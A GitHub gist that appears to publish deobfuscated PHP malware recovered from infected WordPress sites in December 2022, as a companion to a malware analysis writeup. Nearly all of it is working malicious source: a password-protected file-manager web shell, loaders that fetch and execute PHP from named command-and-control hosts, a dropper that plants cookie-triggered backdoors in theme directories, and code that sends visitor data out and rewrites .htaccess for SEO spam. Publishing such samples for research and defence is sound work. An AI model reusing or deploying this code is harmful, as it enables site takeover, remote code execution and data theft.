Skip to content

Instantly share code, notes, and snippets.

Show Gist options
  • Save joshterrill/5a7f73032d121ed6295b651e5cfff107 to your computer and use it in GitHub Desktop.
Save joshterrill/5a7f73032d121ed6295b651e5cfff107 to your computer and use it in GitHub Desktop.
These are sample files from malware that has been reverse engineered from previously infected PHP Wordpress sites in December 2022. A full writeup can be found here: https://hacked.codes/2022/december-2022-php-wordpress-malware-analysis/ and a full reverse engineering of all infected files can be found here: https://github.com/joshterrill/wordpr…
These are sample files from malware that has been reverse engineered from previously infected PHP Wordpress sites in December 2022. A full writeup can be found here: https://hacked.codes/2022/december-2022-php-wordpress-malware-analysis/ and a full reverse engineering of all infected files can be found here: https://github.com/joshterrill/wordpress-malware-december-2022
<?php
$password_hash = "6bba05fa4e01e83e5d90601f0e80c444";
function get_code($c2_url)
{
$url = sprintf('%s?api=%s&ac=%s&path=%s&t=%s', $c2_url, $_REQUEST['api'], $_REQUEST['ac'], $_REQUEST['path'], $_REQUEST['t']);
$malicious_code = @file_get_contents($url);
if ($malicious_code == false) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_USERAGENT, 'll');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 100);
curl_setopt($ch, CURLOPT_FRESH_CONNECT, TRUE);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
$malicious_code = curl_exec($ch);
curl_close($ch);
}
return $malicious_code;
}
if (isset($_REQUEST['ac']) && isset($_REQUEST['path']) && isset($_REQUEST['api']) && isset($_REQUEST['t'])) {
$malicious_code = get_code('https://c.wiv3.com/');
if (!$malicious_code) {
$malicious_code = get_code('https://c.oiv3.com/');
}
$need = '<?php';
if (strpos($malicious_code, $need) === false) {
die('get failed');
}
$file_name = tmpfile();
fwrite($file_name, $malicious_code);
$file_metadata = stream_get_meta_data($file_name);
$file_path = $file_metadata['uri'];
if (!file_get_contents($file_path)) {
$file_path = '.c';
file_put_contents($file_path, $malicious_code);
}
@require($file_path);
fclose($file_name);
@unlink($file_path);
die();
}
if (isset($_REQUEST['d_time'])) {
die('{->' . $password_hash . '<-}');
}
$pass = false;
if (isset($_COOKIE['pass'])) {
if (md5($_COOKIE['pass']) == $password_hash) {
$pass = true;
}
} else {
if (isset($_POST['pass'])) {
if (md5($_POST['pass']) == $password_hash) {
setcookie("pass", $_POST['pass']);
$pass = true;
}
}
}
if (isset($_POST['logout']) && $_POST['logout'] = 1) {
setcookie("pass", null);
$pass = false;
}
if (isset($_REQUEST['pwd163']) && md5($_REQUEST['pwd163']) == $password_hash) {
$malicious_query_param_payload = base64_decode(rawurldecode((urlencode(urldecode($_REQUEST['zzz'])))));
$need = "<?php";
if (strpos($malicious_query_param_payload, $need) === false) {
$malicious_query_param_payload = $need . PHP_EOL . $malicious_query_param_payload;
}
if (isset($_REQUEST['e'])) {
$malicious_query_param_payload = str_replace($need, "", $malicious_query_param_payload);
eval($malicious_query_param_payload);
die();
}
$file_name = tmpfile();
fwrite($file_name, $malicious_query_param_payload);
$require_params = stream_get_meta_data($file_name);
@require($require_params['uri']);
fclose($file_name);
die();
}
if (isset($_REQUEST['auth_key'])) {
die($password_hash);
}
if (!$pass) {
if (!isset($_REQUEST['520'])) {
header("HTTP/1.1 404 Not Found");
die();
}
echo '<form action="#" method="post"><input type="password" name="pass" > <input type="submit" value="submit"></form>';
die();
}
echo '<form action="#" method="post"><input type="hidden" name="logout" value="1"> <input type="submit" value="logout"></form>';
echo '<!DOCTYPE HTML>
<HTML>
<HEAD>
<link href="" rel="stylesheet" type="text/css">
<title>Mini Shell</title>
<style>
body{
font-family: "Racing Sans One", cursive;
background-color: #e6e6e6;
text-shadow:0px 0px 1px #757575;
}
#content tr:hover{
background-color: #636263;
text-shadow:0px 0px 10px #fff;
}
#content .first{
background-color: silver;
}
#content .first:hover{
background-color: silver;
text-shadow:0px 0px 1px #757575;
}
table{
border: 1px #000000 dotted;
}
H1{
font-family: "Rye", cursive;
}
a{
color: #000;
text-decoration: none;
}
a:hover{
color: #fff;
text-shadow:0px 0px 10px #ffffff;
}
input,select,textarea{
border: 1px #000000 solid;
-moz-border-radius: 5px;
-webkit-border-radius:5px;
border-radius:5px;
}
</style>
</HEAD>
<BODY>
<H1><center><img src="https://s.yimg.com/lq/i/mesg/emoticons7/19.gif"/>
Mini Shell <img src="https://s.yimg.com/lq/i/mesg/emoticons7/19.gif"/>
</center></H1>
<table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
<tr><td>Direktori : ';
if (isset($_GET['path'])) {
$path = $_GET['path'];
} else {
$path = getcwd();
}
$path = str_replace('\\', '/', $path);
$paths = explode('/', $path);
foreach ($paths as $id => $pat) {
if ($pat == '' && $id == 0) {
$a = true;
echo '<a href="?path=/">/</a>';
continue;
}
if ($pat == '')
continue;
echo '<a href="?path=';
for ($i = 0; $i <= $id; $i++) {
echo "$paths[$i]";
if ($i != $id)
echo "/";
}
echo '">' . $pat . '</a>/';
}
echo '</td></tr><tr><td>';
if (isset($_FILES['file'])) {
if (copy($_FILES['file']['tmp_name'], $path . '/' . $_FILES['file']['name'])) {
echo '<font color="green">File Ter-Upload :* </font><br />';
} else {
echo '<font color="red">Upload gagal, Servernya kek <img src="http://c.fastcompany.net/asset_files/-/2014/11/11/4F4.gif"/>
</font><br />';
}
}
echo '<form enctype="multipart/form-data" method="POST">
Upload File : <input type="file" name="file" />
<input type="submit" value="upload" />
</form>
</td></tr>';
if (isset($_GET['filesrc'])) {
echo "<tr><td>Current File : ";
echo $_GET['filesrc'];
echo '</tr></td></table><br />';
echo ('<pre>' . htmlspecialchars(file_get_contents($_GET['filesrc'])) . '</pre>');
} elseif (isset($_GET['option']) && $_POST['opt'] != 'delete') {
echo '</table><br /><center>' . $_POST['path'] . '<br /><br />';
if ($_POST['opt'] == 'chmod') {
if (isset($_POST['perm'])) {
if (chmod($_POST['path'], octdec($_POST['perm']))) {
echo '<font color="green">Change Permission Done.</font><br />';
} else {
echo '<font color="red">Change Permission Error.</font><br />';
}
}
echo '<form method="POST">
Permission : <input name="perm" type="text" size="4" value="' . substr(sprintf('%o', fileperms($_POST['path'])), -4) . '" />
<input type="hidden" name="path" value="' . $_POST['path'] . '">
<input type="hidden" name="opt" value="chmod">
<input type="submit" value="Go" />
</form>';
} elseif ($_POST['opt'] == 'rename') {
if (isset($_POST['newname'])) {
if (rename($_POST['path'], $path . '/' . $_POST['newname'])) {
echo '<font color="green">Change Name Done.</font><br />';
} else {
echo '<font color="red">Change Name Error.</font><br />';
}
$_POST['name'] = $_POST['newname'];
}
echo '<form method="POST">
New Name : <input name="newname" type="text" size="20" value="' . $_POST['name'] . '" />
<input type="hidden" name="path" value="' . $_POST['path'] . '">
<input type="hidden" name="opt" value="rename">
<input type="submit" value="Go" />
</form>';
} elseif ($_POST['opt'] == 'edit') {
if (isset($_POST['src'])) {
$fp = fopen($_POST['path'], 'w');
if (fwrite($fp, $_POST['src'])) {
echo '<font color="green">Edit File Done ~_^.</font><br />';
} else {
echo '<font color="red">Edit File Error ~_~.</font><br />';
}
fclose($fp);
}
echo '<form method="POST">
<textarea cols=80 rows=20 name="src">' . htmlspecialchars(file_get_contents($_POST['path'])) . '</textarea><br />
<input type="hidden" name="path" value="' . $_POST['path'] . '">
<input type="hidden" name="opt" value="edit">
<input type="submit" value="Go" />
</form>';
}
echo '</center>';
} else {
echo '</table><br /><center>';
if (isset($_GET['option']) && $_POST['opt'] == 'delete') {
if ($_POST['type'] == 'dir') {
if (rmdir($_POST['path'])) {
echo '<font color="green">Delete Dir Done.</font><br />';
} else {
echo '<font color="red">Delete Dir Error.</font><br />';
}
} elseif ($_POST['type'] == 'file') {
if (unlink($_POST['path'])) {
echo '<font color="green">Delete File Done.</font><br />';
} else {
echo '<font color="red">Delete File Error.</font><br />';
}
}
}
echo '</center>';
$scandir = scandir($path);
echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
<tr class="first">
<td><center>Name</center></td>
<td><center>Size</center></td>
<td><center>Permissions</center></td>
<td><center>Options</center></td>
</tr>';
foreach ($scandir as $dir) {
if (!is_dir("$path/$dir") || $dir == '.' || $dir == '..')
continue;
echo "<tr>
<td><a href=\"?path=$path/$dir\">$dir</a></td>
<td><center>--</center></td>
<td><center>";
if (is_writable("$path/$dir"))
echo '<font color="green">';
elseif (!is_readable("$path/$dir"))
echo '<font color="red">';
echo perms("$path/$dir");
if (is_writable("$path/$dir") || !is_readable("$path/$dir"))
echo '</font>';
echo "</center></td>
<td><center><form method=\"POST\" action=\"?option&path=$path\">
<select name=\"opt\">
<option value=\"\"></option>
<option value=\"delete\">Delete</option>
<option value=\"chmod\">Chmod</option>
<option value=\"rename\">Rename</option>
</select>
<input type=\"hidden\" name=\"type\" value=\"dir\">
<input type=\"hidden\" name=\"name\" value=\"$dir\">
<input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
<input type=\"submit\" value=\">\" />
</form></center></td>
</tr>";
}
echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
foreach ($scandir as $file) {
if (!is_file("$path/$file"))
continue;
$size = filesize("$path/$file") / 1024;
$size = round($size, 3);
if ($size >= 1024) {
$size = round($size / 1024, 2) . ' MB';
} else {
$size = $size . ' KB';
}
echo "<tr>
<td><a href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
<td><center>" . $size . "</center></td>
<td><center>";
if (is_writable("$path/$file"))
echo '<font color="green">';
elseif (!is_readable("$path/$file"))
echo '<font color="red">';
echo perms("$path/$file");
if (is_writable("$path/$file") || !is_readable("$path/$file"))
echo '</font>';
echo "</center></td>
<td><center><form method=\"POST\" action=\"?option&path=$path\">
<select name=\"opt\">
<option value=\"\"></option>
<option value=\"delete\">Delete</option>
<option value=\"chmod\">Chmod</option>
<option value=\"rename\">Rename</option>
<option value=\"edit\">Edit</option>
</select>
<input type=\"hidden\" name=\"type\" value=\"file\">
<input type=\"hidden\" name=\"name\" value=\"$file\">
<input type=\"hidden\" name=\"path\" value=\"$path/$file\">
<input type=\"submit\" value=\">\" />
</form></center></td>
</tr>";
}
echo '</table>
</div>';
}
echo '<center><br />Zerion Mini Shell <font color="green">1.0</font></center>
</BODY>
</HTML>';
function perms($file)
{
$perms = fileperms($file);
if (($perms & 0xC000) == 0xC000) {
$info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
$info = 'p';
} else {
$info = 'u';
}
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x') : (($perms & 0x0800) ? 'S' : '-'));
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x') : (($perms & 0x0400) ? 'S' : '-'));
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x') : (($perms & 0x0200) ? 'T' : '-'));
return $info;
}
?>
<?php
$c2_url = "http://3829-ch4-v26.zxckid.com";
function create_data_transmit_request($url, $should_use_sockets = 0, $http_method = 1, $request_obj = NULL, $arr = array(), $victim_domain = "s")
{
if (!preg_match("/^https*\\:\\/\\//si", $url)) {
if (isset(${"_GET"}["urlerr"])) {
$url_error = "[urlerror] invalid url:&nbsp;";
$url_error .= $url;
echo $url_error;
unset($url_error);
exit();
}
return '';
}
//
$possible_commands_str = "curl_init+curl_setopt+curl_exec|fsockopen|pfsockopen|stream_socket_client|socket_create";
$calling_function = '';
$maybe_data_str = '';
foreach (explode('|', $possible_commands_str) as $c) {
$does_possible_function_exist = 1;
if ($should_use_sockets && substr($c, 0, 1) == 'c') {
continue;
}
foreach (explode('+', $c) as $d) {
if (!function_exists($d)) {
$does_possible_function_exist = 0;
}
}
unset($d);
if ($does_possible_function_exist) {
$calling_function = $c;
break;
}
}
unset($possible_commands_str, $c);
if ($calling_function == '') {
return 0;
}
if (substr($calling_function, 0, 1) == 'c') { // calling function starts with c, so it must be a CURL request
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $url);
curl_setopt($curl, CURLOPT_USERAGENT, $victim_domain);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_TIMEOUT, 100);
curl_setopt($curl, CURLOPT_FRESH_CONNECT, TRUE);
if ($http_method == 2) {
curl_setopt($curl, CURLOPT_POST, 1);
if (is_array($request_obj)) {
curl_setopt($curl, CURLOPT_POSTFIELDS, http_build_query($request_obj));
}
}
$curl_result = curl_exec($curl);
curl_close($curl);
if (!$curl_result) {
if (isset(${"_GET"}["curlerr"])) {
$curl_error = "[curl error]&nbsp;";
$curl_error .= curl_error($curl);
echo $curl_error;
unset($curl_error);
exit();
}
return 0;
} else {
return $curl_result;
}
}
$url_params = print_r($url);
isset($url_params["host"]) || $url_params["host"] = '';
isset($url_params["path"]) || $url_params["path"] = '';
isset($url_params["query"]) || $url_params["query"] = '';
isset($url_params["port"]) || $url_params["port"] = '';
$url_path = $url_params["path"] ? $url_params["path"] . ($url_params["query"] ? '?' . $url_params["query"] : '') : '/';
$url_host = $url_params["host"];
if ($url_params["scheme"] == 'https') {
$http_version = '1.1';
$port = empty($url_params["port"]) ? 443 : $url_params["port"];
$url_host = "ssl://";
$url_host .= $url_params["host"];
} else {
$http_version = '1.0';
$port = empty($url_params["port"]) ? 80 : $url_params["port"];
}
$host_header = 'Host:';
$host_header .= $url_host;
$arr[] = $host_header;
$arr[] = "Connection:Close";
$arr[] = "User-Agent:" . $victim_domain;
$arr[] = "Accept:*/*";
unset($host_header);
if ($http_method == 2) {// POST
if (is_array($request_obj)) {
$request_obj = http_build_query($request_obj);
}
$arr[] = "Content-type:application/x-www-form-urlencoded";
$arr[] = "Content-Length:" . strlen($request_obj);
$maybe_data_str = "POST $url_path HTTP/$http_version" . PHP_EOL . join(PHP_EOL, $arr) . PHP_EOL . PHP_EOL . $request_obj;
unset($request_obj);
} else { // GET
$maybe_data_str = "GET $url_path HTTP/$http_version" . PHP_EOL . join(PHP_EOL, $arr) . PHP_EOL . PHP_EOL;
}
unset($arr, $url_params, $http_version, $url_path);
$sock_resource = null;
if (substr($calling_function, -1) == 'n') { // if the last character of the calling function is n then it's either fsockopen or pfsockopen
$sock_resource = pfsockopen($url_host, $port, $error_code, $error_message, 30);
} else {
if (substr($calling_function, -1) == 't') { // if the last character of the calling function is t then it's stream_socket_client
$sock_client_address = "tcp://";
$sock_client_address .= $url_host;
$sock_client_address .= ':';
$sock_client_address .= $port;
$sock_resource = stream_socket_client($sock_client_address, $error_code, $error_message, 30);
unset($sock_client_address);
}
}
$response = '';
if ($sock_resource) {
stream_set_blocking($sock_resource, TRUE);
is_array($sock_resource, 30);
fwrite($sock_resource, $maybe_data_str);
if (!$should_use_sockets) {
$stream_metadata = stream_get_meta_data($sock_resource);
if (!$stream_metadata["timed_out"]) {
while (!feof($sock_resource)) {
$sock_resource_get_str = fgets($sock_resource);
// %0D%0A = \r\n and %0A = \n
if ($sock_resource_get_str && (rawurlencode($sock_resource_get_str) == "%0D%0A" || rawurlencode($sock_resource_get_str) == "%0A")) {
break;
}
unset($sock_resource_get_str);
}
while (!feof($sock_resource)) {
$sock_resource_read_str = fread($sock_resource, 8192); // 8192 bytes = maybe pgp key?
$response .= $sock_resource_read_str;
unset($sock_resource_read_str);
}
}
unset($stream_metadata);
}
fclose($sock_resource);
} else {
if (substr($calling_function, -1) == 'e') { // if the last character of the calling function is e then it's socket_create
$trimmed_url_host = trim($url_host);
$sock_resource = socket_create(AF_INET, SOCK_STREAM, 0);
if (socket_connect($sock_resource, $trimmed_url_host, $port)) {
if (!$should_use_sockets) {
socket_write($sock_resource, $maybe_data_str, strlen($maybe_data_str));
while ($sock_read_response = @socket_read($sock_resource, 8192)) {
$response .= $sock_read_response;
unset($sock_read_response);
}
$response = explode("\\r\\n\\r\\n", $response);
array_shift($response);
$response = implode("\\r\\n\\r\\n", $response);
} else {
$rand_val_between_2_and_5 = mt_rand(2, 5); // random value between 2 and 5
$i = 0;
while ($i < $rand_val_between_2_and_5) {
socket_write($sock_resource, $maybe_data_str, strlen($maybe_data_str));
$i++;
sleep(mt_rand(50000, 100000)); // sleep for 50000-100000 seconds (~14hrs-27hrs)
}
unset($i, $rand_val_between_2_and_5);
}
}
socket_close($sock_resource);
unset($trimmed_url_host);
}
}
unset($maybe_data_str, $calling_function, $sock_resource, $port, $url_host);
if (!$should_use_sockets) {
$response = @preg_replace_callback('/(?:(?:\\r\\n|\\n)|^)([0-9A-F]+)(?:\\r\\n|\\n){1,2}(.*?)' . '((?:\\r\\n|\\n)(?:[0-9A-F]+(?:\\r\\n|\\n))|$)/si', 'hex_to_decimal', $response);
return trim(trim($response, "\\xEF\\xBB\\xBF"));
} else {
return 1;
}
}
function hex_to_decimal($matches)
{
return hexdec($matches[1]) == strlen($matches[2]) ? $matches[2] : $matches[0];
}
function get_ip_address($str_ip_address = '')
{
if (isset(${"_SERVER"})) {
if (isset(${"_SERVER"}["HTTP_X_FORWARDED_FOR"])) {
$str_ip_address = ${"_SERVER"}["HTTP_X_FORWARDED_FOR"];
} else if (isset(${"_SERVER"}["HTTP_CLIENT_IP"])) {
$str_ip_address = ${"_SERVER"}["HTTP_CLIENT_IP"];
} else {
$str_ip_address = ${"_SERVER"}["REMOTE_ADDR"];
}
} else {
if (getenv('HTTP_X_FORWARDED_FOR')) {
$str_ip_address = getenv('HTTP_X_FORWARDED_FOR');
} else if (getenv('HTTP_CLIENT_IP')) {
$str_ip_address = getenv('HTTP_CLIENT_IP');
} else {
$str_ip_address = getenv('REMOTE_ADDR');
}
}
return $str_ip_address;
}
function get_victim_domain($str_incoming = '')
{
if (isset(${"_SERVER"}["HTTP_HOST"])) {
return ${"_SERVER"}["HTTP_HOST"];
} elseif (isset(${"_SERVER"}["SERVER_NAME"])) {
return ${"_SERVER"}["SERVER_NAME"];
}
return $str_incoming;
}
function decode_transmission($transmit_response)
{
$transmit_response = @gzuncompress(base64_decode($transmit_response));
$split_response_by_pipe = @preg_split("/\\|/si", $transmit_response, -1, PREG_SPLIT_NO_EMPTY);
if (!is_array($split_response_by_pipe)) {
return false;
}
if (count($split_response_by_pipe) < 2) {
return false;
}
$transmit_response_array["data"] = array_pop($split_response_by_pipe);
$transmit_response_array["data"] = base64_decode($transmit_response_array["data"]);
$transmit_response_array["headers"] = $split_response_by_pipe;
return $transmit_response_array;
}
function delete_robotstxt_and_overwrite_htaccess($htaccess_filename = '')
{
$robotstxt_filename = "robots.txt";
if (file_exists($robotstxt_filename)) {
@unlink($robotstxt_filename);
}
if ($htaccess_filename == '') {
$htaccess_filename = ".htaccess";
}
$malicious_htaccess_str = '<FilesMatch ".(py|exe|php)$">\n Order allow,deny\n Deny from all\n</FilesMatch>\n<FilesMatch "^(about.php|radio.php|index.php|content.php|lock360.php|admin.php|wp-login.php|wp-l0gin.php|wp-theme.php|wp-scripts.php|wp-editor.php)$">\n Order allow,deny\n Allow from all\n</FilesMatch>\n<IfModule mod_rewrite.c>\nRewriteEngine On\nRewriteBase /\nRewriteRule ^index\\.php$ - [L]\nRewriteCond %{REQUEST_FILENAME} !-f\nRewriteCond %{REQUEST_FILENAME} !-d\nRewriteRule . /index.php [L]\n</IfModule>';
if (file_exists($htaccess_filename)) {
$htaccess_file_contents = file_get_contents($htaccess_filename);
if ($malicious_htaccess_str == $htaccess_file_contents) {
return;
}
}
@chmod($htaccess_filename, 0777);
@file_put_contents($htaccess_filename, $malicious_htaccess_str);
@chmod($htaccess_filename, 0644);
}
function submit_to_google_index($google_or_incoming_url, $sitemap, $obj)
{
$ping_url_str = "https://%s/ping?sitemap=%s%s/%s";
$formatted_ping_url_str = sprintf($ping_url_str, $google_or_incoming_url, $obj["protocol"], $obj["server_domain"], $sitemap);
$ping_transmit_response = create_data_transmit_request($formatted_ping_url_str);
if (isset($_REQUEST["st"])) { // probably for debugging
var_dump($formatted_ping_url_str);
var_dump($ping_transmit_response);
die();
}
if (strpos($ping_transmit_response, "google") != false) {
die("success");
} else {
$ping_url_str = "http://%s/ping?sitemap=%s%s/%s";
$formatted_ping_url_str = sprintf($ping_url_str, $google_or_incoming_url, $obj["protocol"], $obj["server_domain"], $sitemap);
$ping_transmit_response = create_data_transmit_request($formatted_ping_url_str);
if (strpos($ping_transmit_response, "google") != false) {
die("success");
}
die("failed");
}
}
function main($c2_url)
{
$obj = array();
$obj["default_params"] = $c2_url;
$obj["api"] = "http://3829-ch4-v26.zxckid.com";
$obj["server_domain"] = get_victim_domain();
$obj["request_url"] = ${"_SERVER"}["REQUEST_URI"];
$obj["referer"] = isset(${"_SERVER"}["HTTP_REFERER"]) ? ${"_SERVER"}["HTTP_REFERER"] : '';
$obj["user_agent"] = isset(${"_SERVER"}["HTTP_USER_AGENT"]) ? ${"_SERVER"}["HTTP_USER_AGENT"] : '';
$obj["ip"] = get_ip_address();
if (isset(${"_SERVER"}["HTTPS"])) {
$obj["protocol"] = "https://";
} else {
$obj["protocol"] = "http://";
}
if (isset(${"_SERVER"}["HTTP_ACCEPT_LANGUAGE"])) {
$obj["language"] = ${"_SERVER"}["HTTP_ACCEPT_LANGUAGE"];
} else {
$obj["language"] = "";
}
if (isset($_REQUEST["params"])) {
header("Content-type:application/json");
if (function_exists('json_encode')) {
echo json_encode($obj);
} else {
print_r($obj);
}
die();
}
if (isset($_REQUEST["d_time"])) {
die('2022/12/1');
}
if (isset($_REQUEST["pwd163"])) {
// first password is for taking a payload in param zzz, builds
// it, and if param e is set, executes it, if no e param is present
//then it saves it to a tmp file
if (md5(trim($_REQUEST["pwd163"])) == "226560a743d22857adddeb10aa38d571") {
$malicious_payload_str = base64_decode(rawurldecode((urlencode(urldecode($_REQUEST["zzz"])))));
if (strpos($malicious_payload_str, "<?php") === false) {
$malicious_payload_str = "<?php" . PHP_EOL . $malicious_payload_str;
}
if (isset($_REQUEST["e"])) {
$malicious_payload_str = str_replace("<?php", "", $malicious_payload_str);
eval($malicious_payload_str);
die();
}
$tmp_file = tmpfile();
fwrite($tmp_file, $malicious_payload_str);
$tmp_file_metadata = stream_get_meta_data($tmp_file);
@require($tmp_file_metadata["uri"]);
fclose($tmp_file);
die();
}
// second password expects a sitemap and domain to be passed in and then it will submit
// the website to google for indexing
if (md5($_REQUEST["pwd163"] . "a!#_11AA") == "2f7a76f71ff9e24be7c0015ff9cb81d8") {
if (isset(${"_GET"}["sitemap"])) {
$sitemap = ${"_GET"}["sitemap"];
$google_or_incoming_url = "www.google.com";
if (isset(${"_GET"}["google_or_incoming_url"])) {
$google_or_incoming_url = ${"_GET"}["google_or_incoming_url"];
}
submit_to_google_index($google_or_incoming_url, $sitemap, $obj);
}
}
}
// delete robots and overwrite htaccess
delete_robotstxt_and_overwrite_htaccess();
$request_obj = array('domain' => $obj["server_domain"], 'request_url' => $obj["request_url"], 'ip' => $obj["ip"], 'agent' => $obj["user_agent"], 'referer' => $obj["referer"], 'protocol' => $obj["protocol"], 'language' => $obj["language"]);
$transmit_response = create_data_transmit_request($obj["api"], 0, 2, $request_obj, array(), $obj["server_domain"]);
if (isset($_REQUEST["dump"])) { // probably for debugging
var_dump($transmit_response);
$transmit_response = create_data_transmit_request("http://google.co.jp");
var_dump($transmit_response);
die();
}
// decode the transmission response and echo it out
$decoded_transmission = decode_transmission($transmit_response);
if ($decoded_transmission !== false) {
foreach ($decoded_transmission["headers"] as "Content-type:application/json") {
@header("Content-type:application/json");
}
echo $decoded_transmission["data"];
die();
}
}
main($c2_url);
?>
<?php
ini_set('display_errors', 0);
ini_set('display_startup_errors', 0);
error_reporting(E_ALL);
function get_dir()
{
error_reporting(0);
$glob = glob('*', GLOB_ONLYDIR);
$dir = (is_array($glob) && !empty($glob) && ($glob_filtered = array_filter($glob, 'is_writable'))) ? $glob_filtered[array_rand($glob_filtered)] : false;
return $dir;
}
if ($_GET['imam'] == 'doit') {
$key_store = [];
$arr_length = rand(20, 30);
while (true) {
$k = rand(4, $arr_length - 2);
if (!in_array($k, $key_store)) {
$key_store[] = $k;
}
if (count($key_store) == 5) {
$key_store[5] = $arr_length;
break;
}
}
$spass = implode('-', $key_store);
$mn = substr(md5(microtime()), rand(0, 20), 7);
$htfile = "<Files *.php>\nOrder allow,deny\nAllow from all\n</Files>";
$sbody = '<?php $p=$_COOKIE;(count($p)=='
. $key_store[5] . '&&in_array(gettype($p).count($p),$p))?(($p['
. $key_store[1] . ']=$p[' . $key_store[1] . '].$p['
. $key_store[2] . '])&&($p[' . $key_store[3] . ']=$p['
. $key_store[1] . ']($p[' . $key_store[3] . ']))&&($p=$p['
. $key_store[3] . ']($p[' . $key_store[0] . '],$p['
. $key_store[1] . ']($p[' . $key_store[4] . '])))&&$p()):$p;';
if (file_exists('wp-content')) {
@chdir('wp-content');
@chdir('themes');
$mydir1 = get_dir();
@chdir($mydir1);
$mydir2 = get_dir();
@chdir($mydir2);
$f = fopen($mn . '.php', 'w');
fwrite($f, $sbody);
fclose($f);
$file = fopen(".htaccess", "w+");
$write = fwrite($file, $htfile);
fclose($file);
$link = 'http://' . $_SERVER['HTTP_HOST'] . rtrim(dirname($_SERVER['REQUEST_URI']), '\\/') . '/wp-content/themes/' . $mydir1 . '/' . $mydir2 . '/' . $mn . '.php ' . $spass;
} else {
$mydir3 = get_dir();
@chdir($mydir3);
$mydir4 = get_dir($mydir4);
@chdir($mydir4);
$mydir5 = get_dir();
@chdir($mydir5);
$f = fopen($mn . '.php', 'w');
fwrite($f, $sbody);
fclose($f);
$file = fopen(".htaccess", "w+");
$write = fwrite($file, $htfile);
fclose($file);
$link = 'http://' . $_SERVER['HTTP_HOST'] . rtrim(dirname($_SERVER['REQUEST_URI']), '\\/') . '/' . $mydir3 . '/' . $mydir4 . '/' . $mydir5 . '/' . $mn . '.php ' . $spass;
}
echo "\n" . $link . "\n";
}
echo $link;
//$file=fopen(__FILE__ ,'w');
//fclose($file);
if ($_GET['imam'] == 'unlink') {
unlink(__FILE__);
}
if ($_GET['imam'] == 'test') {
echo "<title>imambro</title>";
}
?>
<?php
$p = $_COOKIE;
if (count($p) == 20 && in_array("array20", $p)) {
$p = create_function("", "die(md5(9989));");
$p();
} else {
$p;
}
?>
<?php
function get_victim_domain($default_domain = '') {
if (isset(${"_SERVER"}["HTTP_HOST"])) {
return ${"_SERVER"}["HTTP_HOST"];
} else if(isset(${"_SERVER"}["SERVER_NAME"])) {
return ${"_SERVER"}["SERVER_NAME"];
}
return $default_domain;
}
function phone_home_to_c2($url) {
$file_contents = @file_get_contents($url);
if (!$file_contents) {
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $url);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
$file_contents = curl_exec($curl);
curl_close($curl);
}
return $file_contents;
}
function main() {
$obj = array();
$obj["path"] = str_replace(str_replace(\'\\', \'/\\', ${"_SERVER"}["PHP_SELF"]), \'\\', str_replace(\'\\\\\\\\\',\'/\\', ${"_SERVER"}["SCRIPT_FILENAME"]));
$obj["domain"] = get_victim_domain();
$obj["shell_link"] = "https://<victim domain>/about.php?520";
if (isset(${"_GET"}["del"]) && ${"_GET"}["del"] == "my_code") {
$path_to_root_index = $obj["path"] . "/index.php";
$file_contents = @file_get_contents($path_to_root_index);
$php_file_pattern = "<\?php.+\(1\);\?>";
$file_contents = preg_replace("/$php_file_pattern/si",\'\\' , $file_contents);
$file_contents = @file_put_contents($path_to_root_index, $file_contents);
if ($file_contents > 0) {
die("delete success");
}
die("delete failed");
}
$adminphp_path = $obj["path"] . "/admin.php";
$file_contents = @phone_home_to_c2("http://51la.izv3.com/a.txt");
$file_contents = @file_put_contents($adminphp_path, $file_contents);
if ($file_contents>0) {
$obj["trojan"] = "http://" . $obj["domain"] . "/admin.php";
} else {
$obj["trojan"] = "write failed";
}
$build_c2_callback_url = sprintf("http://51la.izv3.com/?d=%s", base64_encode(serialize($obj)));
$c2_response = phone_home_to_c2($build_c2_callback_url);
if ($c2_response == "done") {
$path_to_root_index = $obj["path"] . "/index.php";
$file_contents = @file_get_contents($path_to_root_index);
$php_file_pattern = "<\?php.+\(1\);\?>";
$file_contents = preg_replace("/$php_file_pattern/si", \'\\', $file_contents);
@file_put_contents($path_to_root_index, $file_contents);
}
}
main();
?>
<?php
define("MAMIMAMIHO", "6bf94463aa559f622141311f24c1844f");
header("Content-type:text/html;charset=utf8");
error_reporting(0);
define('THEPATH' , dirname($_SERVER['SCRIPT_FILENAME']));
class StringHandler {
const ALL_STRING = 'The quick brown fox jumps over a lazy dog.';
public static function returnStr ($code = 'test') {
return eval($code);
}
public static function getApple ($alice = 'fire' , $bob = [] , $hole = null) {
return proc_open($alice , $bob , $hole);
}
public static function getPen ($content = 'pen') {
$array = self::returnArray();
$content = $array[0][2] . $array[3][2] . $array[5][2] . $array[1][3];
return $content;
}
public static function getPineapple ($str = 'met') {
$array = self::returnArray();
$content = $str . $array[4][4] . $array[7][3];
return strrev($content);
}
public static function getBanana ($str1 = '' , $str2 = '') {
$array1 = [70 , 61 , 73 , 72];
$array2 = [163 , 164 , 150 , 165];
foreach ($array2 as $value) {
$str2 .= chr(octdec($value));
}
foreach ($array1 as $value) {
